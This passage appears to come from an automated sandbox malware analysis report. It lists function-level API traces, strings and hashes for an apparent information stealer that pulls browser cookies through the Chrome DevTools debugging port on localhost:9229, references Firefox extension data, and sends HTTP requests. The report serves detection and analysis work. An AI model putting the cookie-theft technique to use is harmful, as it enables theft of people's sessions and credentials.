                                                      Function 004092B0 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 365stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004090C0: InternetOpenA.WININET(Function_0002CFF4,00000001,00000000,00000000,00000000), ref: 004090DF
                                                        • Part of subcall function 004090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004090FC
                                                        • Part of subcall function 004090C0: InternetCloseHandle.WININET(00000000), ref: 00409109
                                                        • Part of subcall function 004090C0: strlen.MSVCRT ref: 00409125
                                                      • strlen.MSVCRT ref: 004092E1
                                                      • strlen.MSVCRT ref: 004092FA
                                                        • Part of subcall function 00417F70: memchr.MSVCRT ref: 00417FAF
                                                        • Part of subcall function 00417F70: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417FC9
                                                        • Part of subcall function 00417F70: memchr.MSVCRT ref: 00417FE8
                                                        • Part of subcall function 00408980: std::_Xinvalid_argument.LIBCPMT ref: 00408996
                                                      • memset.MSVCRT ref: 00409341
                                                      • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040935C
                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00409372
                                                      • strlen.MSVCRT ref: 00409399
                                                      • strlen.MSVCRT ref: 004093E6
                                                      • memcmp.MSVCRT(?,Function_0002CFF4,?), ref: 0040940B
                                                      • memset.MSVCRT ref: 00409532
                                                      • lstrcatA.KERNEL32(?,cookies), ref: 00409547
                                                      • lstrcatA.KERNEL32(?,0043179C), ref: 00409559
                                                      • lstrcatA.KERNEL32(?,?), ref: 0040956A
                                                      • lstrcatA.KERNEL32(?,00434BA0), ref: 0040957C
                                                      • lstrcatA.KERNEL32(?,?), ref: 0040958D
                                                      • lstrcatA.KERNEL32(?,.txt), ref: 0040959F
                                                      • lstrlenA.KERNEL32(?), ref: 004095B6
                                                      • lstrlenA.KERNEL32(?), ref: 004095DB
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00409614
                                                      • memset.MSVCRT ref: 0040965C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$strlen$Internetmemset$Openlstrlenmemchrmemcmp$CloseHandleXinvalid_argumentlstrcpystd::_
                                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                                      • API String ID: 2819545660-3542011879
                                                      • Opcode ID: e3ab2ed6a6ca2e6a926d440d0d5d1526cccfabf02e2b455fdd1088b695db4e17
                                                      • Instruction ID: d96677364779d0a81b59f4340a1f2474f338e47f496b49ff071e593b853f3e6b
                                                      • Opcode Fuzzy Hash: e3ab2ed6a6ca2e6a926d440d0d5d1526cccfabf02e2b455fdd1088b695db4e17
                                                      • Instruction Fuzzy Hash: 14E11671E00218DBDF14DFA9D984ADEBBB5BF48304F10446AE509B7281DB78AE45CF98
                                                      Function 02C84737 Relevance: 39.3, APIs: 26, Instructions: 334stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8476A
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8479D
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C847C5
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C847D0
                                                      • lstrlen.KERNEL32(00434CFC), ref: 02C847DB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C847F8
                                                      • lstrcat.KERNEL32(00000000,00434CFC), ref: 02C84804
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8482D
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84838
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8485F
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8489E
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C848A6
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C848B1
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C848CE
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C848DA
                                                      • lstrlen.KERNEL32(00434D10), ref: 02C848E5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84902
                                                      • lstrcat.KERNEL32(00000000,00434D10), ref: 02C8490E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84935
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84967
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 02C8496E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C849C8
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C849F1
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84A1A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84A42
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C84A76
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                                      • String ID:
                                                      • API String ID: 1033685851-0
                                                      • Opcode ID: 5d564a2f18783ced4a2ae64bbd7691d68900a1d5d45daa34de3019e736e23f54
                                                      • Instruction ID: ac269c04655d0f7719198f36e820bb176e5e2d31e2190e727296ee0c108120fe
                                                      • Opcode Fuzzy Hash: 5d564a2f18783ced4a2ae64bbd7691d68900a1d5d45daa34de3019e736e23f54
                                                      • Instruction Fuzzy Hash: 7EB19270A016579BDB24BF75CD88AAE7BAAAF54308F048428EC05E7250DB34D944EFA1
                                                      Function 004219F0 Relevance: 37.8, APIs: 25, Instructions: 269stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00421A1F
                                                      • lstrlenA.KERNEL32(02D65E50,00000000,00000000,?,?,00421D51), ref: 00421A30
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A57
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00421A62
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A91
                                                      • lstrlenA.KERNEL32(00434FA8,?,?,00421D51), ref: 00421AA3
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AC4
                                                      • lstrcatA.KERNEL32(00000000,00434FA8,?,?,00421D51), ref: 00421AD0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AFF
                                                      • lstrlenA.KERNEL32(02D65FC0,?,?,00421D51), ref: 00421B15
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421B3C
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00421B47
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421B76
                                                      • lstrlenA.KERNEL32(00434FA8,?,?,00421D51), ref: 00421B88
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421BA9
                                                      • lstrcatA.KERNEL32(00000000,00434FA8,?,?,00421D51), ref: 00421BB5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421BE4
                                                      • lstrlenA.KERNEL32(02D65F90,?,?,00421D51), ref: 00421BFA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421C21
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00421C2C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421C5B
                                                      • lstrlenA.KERNEL32(02D65FD0,?,?,00421D51), ref: 00421C71
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421C98
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00421CA3
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421CD2
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 1049500425-0
                                                      • Opcode ID: e0ae158bfbcb9c85c3e113c7f8b0e949cdbc83a006c5a98e9bc8346273ae2ebe
                                                      • Instruction ID: 5f1dba79be954e749d9ca3b884a51ff6cc0f3d545b3a00a63ec801d565367c8d
                                                      • Opcode Fuzzy Hash: e0ae158bfbcb9c85c3e113c7f8b0e949cdbc83a006c5a98e9bc8346273ae2ebe
                                                      • Instruction Fuzzy Hash: 1B9131B07017039FD7209FBADD88A17B7E9AF24344F54542EA885D33A1DBB8E8418B64
                                                      Function 02C713F7 Relevance: 36.3, APIs: 24, Instructions: 278stringfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memset.MSVCRT ref: 02C71411
                                                        • Part of subcall function 02C71387: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02C7139C
                                                        • Part of subcall function 02C71387: RtlAllocateHeap.NTDLL(00000000), ref: 02C713A3
                                                        • Part of subcall function 02C71387: RegOpenKeyExA.ADVAPI32(80000001,0043175C,00000000,00020119,?), ref: 02C713C0
                                                        • Part of subcall function 02C71387: RegQueryValueExA.ADVAPI32(?,00431750,00000000,00000000,00000000,000000FF), ref: 02C713DA
                                                        • Part of subcall function 02C71387: RegCloseKey.ADVAPI32(?), ref: 02C713E4
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C71427
                                                      • lstrlen.KERNEL32(?), ref: 02C71434
                                                      • lstrcat.KERNEL32(?,00431780), ref: 02C7144F
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C71486
                                                      • lstrlen.KERNEL32(006389F0), ref: 02C71494
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C714B8
                                                      • lstrcat.KERNEL32(00000000,006389F0), ref: 02C714C0
                                                      • lstrlen.KERNEL32(00431788), ref: 02C714CB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C714EF
                                                      • lstrcat.KERNEL32(00000000,00431788), ref: 02C714FB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C71521
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C71566
                                                      • lstrlen.KERNEL32(00638CA4), ref: 02C71575
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C7159C
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C715A4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C715DF
                                                      • lstrcat.KERNEL32(00000000), ref: 02C715EC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C71613
                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 02C7163C
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C71668
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C716A4
                                                        • Part of subcall function 02C8F227: lstrcpy.KERNEL32(00000000,?), ref: 02C8F259
                                                      • DeleteFileA.KERNEL32(?), ref: 02C716D8
                                                      • memset.MSVCRT ref: 02C716F5
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocateCloseCopyDeleteOpenProcessQueryValue
                                                      • String ID:
                                                      • API String ID: 1397529057-0
                                                      • Opcode ID: 02a401fdbfd53112a87c377777521942dd75233243d21b937a97fbc6e85f9cba
                                                      • Instruction ID: bfd1e2df305d0854c645afbe011aa96879ee451d612d00d6b16d562f5fb82b7a
                                                      • Opcode Fuzzy Hash: 02a401fdbfd53112a87c377777521942dd75233243d21b937a97fbc6e85f9cba
                                                      • Instruction Fuzzy Hash: 36A191B5A016469BDB10EFB5CC89E9E7BBAEF44304F084024E809E7250EB74DA45DFA1
                                                      Function 02C8AF69 Relevance: 31.5, APIs: 25, Instructions: 297stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32 ref: 02C8AF86
                                                      • lstrlen.KERNEL32(00638DD4), ref: 02C8AF9C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8AFC4
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C8AFCF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8AFF8
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B03B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C8B045
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B06E
                                                      • lstrlen.KERNEL32(00434ADC), ref: 02C8B088
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B0AA
                                                      • lstrcat.KERNEL32(00000000,00434ADC), ref: 02C8B0B6
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B0DF
                                                      • lstrlen.KERNEL32(00434ADC), ref: 02C8B0F1
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B113
                                                      • lstrcat.KERNEL32(00000000,00434ADC), ref: 02C8B11F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B148
                                                      • lstrlen.KERNEL32(00638DB8), ref: 02C8B15E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B186
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C8B191
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B1BA
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8B1F6
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C8B200
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8B226
                                                      • lstrlen.KERNEL32(00000000), ref: 02C8B23C
                                                      • lstrcpy.KERNEL32(00000000,00638A98), ref: 02C8B26F
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen
                                                      • String ID:
                                                      • API String ID: 2762123234-0
                                                      • Opcode ID: cd65f75ed4db879bd52a93410a766dc55dafbe49688ec912da15a99145c2f284
                                                      • Instruction ID: 2a3980d620f1e79ff1105aac88e213a2a81ea9e2a25a8b22ba1e62ee7529628d
                                                      • Opcode Fuzzy Hash: cd65f75ed4db879bd52a93410a766dc55dafbe49688ec912da15a99145c2f284
                                                      • Instruction Fuzzy Hash: B0B15D719016169BDB11FF74CC88AAEB7B6EF8030CF048529E815E7250EB74EA45EF91
                                                      Function 02C91C57 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C91C86
                                                      • lstrlen.KERNEL32(00638DEC), ref: 02C91C97
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91CBE
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C91CC9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91CF8
                                                      • lstrlen.KERNEL32(00434FA8), ref: 02C91D0A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91D2B
                                                      • lstrcat.KERNEL32(00000000,00434FA8), ref: 02C91D37
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91D66
                                                      • lstrlen.KERNEL32(00638B1C), ref: 02C91D7C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91DA3
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C91DAE
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91DDD
                                                      • lstrlen.KERNEL32(00434FA8), ref: 02C91DEF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91E10
                                                      • lstrcat.KERNEL32(00000000,00434FA8), ref: 02C91E1C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91E4B
                                                      • lstrlen.KERNEL32(00638D70), ref: 02C91E61
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91E88
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C91E93
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91EC2
                                                      • lstrlen.KERNEL32(00638D6C), ref: 02C91ED8
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91EFF
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C91F0A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91F39
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 1049500425-0
                                                      • Opcode ID: 3ed29eb2a36c33d740b86cf4f2910b79400a7080f226144e00af5aafdd96284d
                                                      • Instruction ID: 6309a4207c0e1c164571bda107048ee6c72b24e748fdf3eb3577b699fd497e06
                                                      • Opcode Fuzzy Hash: 3ed29eb2a36c33d740b86cf4f2910b79400a7080f226144e00af5aafdd96284d
                                                      • Instruction Fuzzy Hash: 4B9163B1600743DFDB209FB9CD8DA1677EEEF54348B185828A886D3650DBB4D940DF60
                                                      Function 02C84B27 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84B5A
                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 02C84B8C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C84BD9
                                                      • lstrlen.KERNEL32(00434B68), ref: 02C84BE4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84C01
                                                      • lstrcat.KERNEL32(00000000,00434B68), ref: 02C84C0D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84C32
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84C5F
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84C6A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84C91
                                                      • StrStrA.SHLWAPI(?,00000000), ref: 02C84CA3
                                                      • lstrlen.KERNEL32(?), ref: 02C84CB7
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C84CF8
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84D7F
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84DA8
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84DD1
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84DF7
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84E24
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                                      • API String ID: 4107348322-3310892237
                                                      • Opcode ID: d1396ed1204108ce90e311fad75970def6b21bff9892f976cce6df64658cec1e
                                                      • Instruction ID: 0f67d9bcbd9bb5752692d64fdd45431dd8471941272f89c778a4f0a1710e2deb
                                                      • Opcode Fuzzy Hash: d1396ed1204108ce90e311fad75970def6b21bff9892f976cce6df64658cec1e
                                                      • Instruction Fuzzy Hash: EBB1B375A016479BDB24FF79CD84AAE7BA6EF94308F048428EC01A7610EB34ED45DF91
                                                      Function 02C8F73F Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlen.KERNEL32(00638DB4), ref: 02C8F75C
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8F7EA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8F80E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8F8C2
                                                      • lstrcpy.KERNEL32(00000000,00638DB4), ref: 02C8F902
                                                      • lstrcpy.KERNEL32(00000000,00638C7C), ref: 02C8F931
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8F9E5
                                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 02C8FA63
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8FA93
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8FAE1
                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 02C8FB5F
                                                      • lstrlen.KERNEL32(00638DBC), ref: 02C8FB8D
                                                      • lstrcpy.KERNEL32(00000000,00638DBC), ref: 02C8FBB8
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8FBDA
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8FC2B
                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 02C8FE79
                                                      • lstrlen.KERNEL32(00638BB0), ref: 02C8FEA7
                                                      • lstrcpy.KERNEL32(00000000,00638BB0), ref: 02C8FED2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8FEF4
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8FF45
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen
                                                      • String ID: ERROR
                                                      • API String ID: 367037083-2861137601
                                                      • Opcode ID: 9c389040a0931cff84f6a8ce16c057d4dd3fd095c43156bdc360670e935f1f34
                                                      • Instruction ID: 5f4ca481ea00ccc04e87db0883023208b1b1c46fe32ffa3119813e8120246c2b
                                                      • Opcode Fuzzy Hash: 9c389040a0931cff84f6a8ce16c057d4dd3fd095c43156bdc360670e935f1f34
                                                      • Instruction Fuzzy Hash: 9AF14E30A01602CFDB24EF29C884B69B7E6BF8531CB68C1ADD8099B761E775D941CF91
                                                      Function 02C76EA7 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 229networkstringfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C76ED6
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C76F29
                                                      • InternetOpenA.WININET(0042CFF4,00000001,00000000,00000000,00000000), ref: 02C76F3C
                                                      • StrCmpCA.SHLWAPI(?,00638C80), ref: 02C76F54
                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02C76F7C
                                                      • HttpOpenRequestA.WININET(00000000,00434AC0,?,00638AB4,00000000,00000000,-00400100,00000000), ref: 02C76FB7
                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02C76FDE
                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02C76FED
                                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02C7700C
                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02C77066
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C770C2
                                                      • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 02C770E4
                                                      • InternetCloseHandle.WININET(00000000), ref: 02C770F5
                                                      • InternetCloseHandle.WININET(?), ref: 02C770FF
                                                      • InternetCloseHandle.WININET(00000000), ref: 02C77109
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C7712A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                                      • String ID: ERROR
                                                      • API String ID: 3687753495-2861137601
                                                      • Opcode ID: 10eecb2712b1ebf3cd3b69d88b62727bb4550a32710522d9711ab1fa4818b2f2
                                                      • Instruction ID: 7b035a52bd0ba91ed76b9492d74b1d662c5717ae21b07cc4031770bca511bf89
                                                      • Opcode Fuzzy Hash: 10eecb2712b1ebf3cd3b69d88b62727bb4550a32710522d9711ab1fa4818b2f2
                                                      • Instruction Fuzzy Hash: 9D819471A0171AAFEB10DFA4DC85FAEB7B9EF44704F144168F905E7280DB70AA458BE4
                                                      Function 004090C0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 161networkstringfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenA.WININET(Function_0002CFF4,00000001,00000000,00000000,00000000), ref: 004090DF
                                                      • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004090FC
                                                      • InternetCloseHandle.WININET(00000000), ref: 00409109
                                                      • strlen.MSVCRT ref: 00409125
                                                      • InternetReadFile.WININET(?,?,?,00000000), ref: 00409166
                                                      • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409197
                                                      • InternetCloseHandle.WININET(00000000), ref: 004091A2
                                                      • InternetCloseHandle.WININET(00000000), ref: 004091A9
                                                      • strlen.MSVCRT ref: 004091BA
                                                      • strlen.MSVCRT ref: 004091ED
                                                      • strlen.MSVCRT ref: 0040922E
                                                        • Part of subcall function 00417F70: memchr.MSVCRT ref: 00417FAF
                                                        • Part of subcall function 00417F70: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417FC9
                                                        • Part of subcall function 00417F70: memchr.MSVCRT ref: 00417FE8
                                                      • strlen.MSVCRT ref: 0040924C
                                                        • Part of subcall function 00408980: std::_Xinvalid_argument.LIBCPMT ref: 00408996
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$strlen$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_
                                                      • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                                      • API String ID: 4166274400-2144369209
                                                      • Opcode ID: 618f1d16746cdee0f75affe8386251566d45d2139d149d17cb66918cb6f28876
                                                      • Instruction ID: 3da038be7106f6833ad32b0a15d05febb0a1008003ef6f9fefd8fd85e3a80bf5
                                                      • Opcode Fuzzy Hash: 618f1d16746cdee0f75affe8386251566d45d2139d149d17cb66918cb6f28876
                                                      • Instruction Fuzzy Hash: 1651B771740205ABE720DBA8DC45BDEF7B9DF48710F14016AF505B32C1DBB8A94587A9
                                                      Function 02C93B97 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 222registrystringCOMMON
                                                      Download Yara Rule
                                                      APIs
